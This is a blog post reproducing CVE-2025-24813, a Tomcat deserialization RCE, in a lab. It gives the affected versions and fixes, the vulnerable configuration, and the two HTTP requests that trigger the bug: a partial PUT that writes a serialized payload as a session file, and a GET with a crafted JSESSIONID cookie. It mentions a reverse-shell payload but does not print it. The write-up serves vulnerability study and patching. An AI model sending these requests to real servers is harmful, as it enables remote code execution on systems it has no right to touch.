CVE-2025-24813

References

Qi An Xin Attack & Defense Community: CVE-2025-24813 Tomcat latest RCE analysis and reproduction (butian.net)

Affected versions

  • 9.0.0.M1 <= Tomcat <= 9.0.98
  • 10.1.0-M1 <= Tomcat <= 10.1.34
  • 11.0.0-M1 <= Tomcat <= 11.0.2

Fixed in 9.0.99, 10.1.35 and 11.0.3.

Exploitation conditions

  1. The application has writes enabled for the DefaultServlet (readonly=false). This is off by default.
  2. The application supports partial PUT requests (a PUT carrying a Content-Range header), which lets an attacker write malicious serialized data into a file in the work directory that Tomcat later treats as a session file. Partial PUT is on by default in the affected versions.
  3. The application uses Tomcat's file-based session persistence (PersistentManager with a FileStore) with the default storage location. This requires extra configuration.
  4. A library with a usable deserialization gadget chain, for example commons-collections, is on the classpath. Whether this holds depends on what the application's own dependencies pull in.

All four conditions must hold for the RCE path reproduced below.

Environment setup

Download Tomcat

Download link:

Apache Archive Distribution Directory

Modify the configuration

conf/web.xml

Edit web.xml

Find the default servlet definition and change it to the following:

    <servlet>
        <servlet-name>default</servlet-name>
        <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
        <init-param>
            <param-name>debug</param-name>
            <param-value>0</param-value>
        </init-param>
        <init-param>
            <param-name>listings</param-name>
            <param-value>false</param-value>
        </init-param>
        <init-param>
            <param-name>readonly</param-name>
            <param-value>false</param-value>
        </init-param>
        <load-on-startup>1</load-on-startup>
    </servlet>

You can find this block by searching the file for default.

The change is setting readonly to false (Tomcat's default is true), which lets the DefaultServlet accept PUT and DELETE requests.

conf/context.xml

Change the end of the file so that it looks like this:

    <?xml version="1.0" encoding="UTF-8"?>
    <!--
      Licensed to the Apache Software Foundation (ASF) under one or more
      contributor license agreements. See the NOTICE file distributed with
      this work for additional information regarding copyright ownership.
      The ASF licenses this file to You under the Apache License, Version 2.0
      (the "License"); you may not use this file except in compliance with
      the License. You may obtain a copy of the License at

          http://www.apache.org/licenses/LICENSE-2.0

      Unless required by applicable law or agreed to in writing, software
      distributed under the License is distributed on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
      See the License for the specific language governing permissions and
      limitations under the License.
    -->
    <!-- The contents of this file will be loaded for each web application -->
    <Context>

        <!-- Default set of monitored resources. If one of these changes, the -->
        <!-- web application will be reloaded. -->
        <WatchedResource>WEB-INF/web.xml</WatchedResource>
        <WatchedResource>WEB-INF/tomcat-web.xml</WatchedResource>
        <WatchedResource>${catalina.base}/conf/web.xml</WatchedResource>

        <!-- Uncomment this to disable session persistence across Tomcat restarts -->
        <!--
        <Manager pathname="" />
        -->

        <Manager className="org.apache.catalina.session.PersistentManager">
            <Store className="org.apache.catalina.session.FileStore"/>
        </Manager>
    </Context>

Download the Commons Collections library

Commons Collections 3.2.1.jar

Maven Repository: commons-collections » commons-collections » 3.2.1 (mvnrepository.com)

This gives you a jar file.

Place it at webapps/ROOT/WEB-INF/lib/commons-collections-3.2.1.jar

The lib directory does not exist in the stock ROOT webapp, so create it first.

Start Tomcat

Tomcat starts successfully.

Generating the payload

Yakit is used here, because Burp cannot automatically base64-decode the payload when sending the request.

I tried a reverse shell.

Generate the base64.

Reproduction

The class file version shown is 52, which means the target runs Java 8.

Replace the request with the following:

    PUT /xxxxx/session HTTP/1.1
    Host: 192.168.131.32:8080
    Content-Length: 1000
    Content-Range: bytes 0-1000/1200

    {{serialized payload content}}

Content-Length must match the length of the decoded payload, and the Content-Range total has to be larger than the end offset. Tomcat only validates start <= end < total and does not cross-check the range against Content-Length, so the slightly off 0-1000 above still works; 0-999/1200 would be the exact form.


Add the second request:

    GET / HTTP/1.1
    Host: 127.0.0.1:8080
    Cookie: JSESSIONID=.xxxxx

Send the first request.

It writes a file:

work/Catalina/localhost/ROOT/.au9u5t.session

au9u5t is what I replaced xxxxx with.

Sending the second request then loads that file as a session, the deserialization fires, and the reproduction is complete.


CVE-2025-24813
https://tsy244.github.io/2025/03/15/漏洞复现/CVE-2025-24813/
Author: August Rosenberg
Posted on: March 15, 2025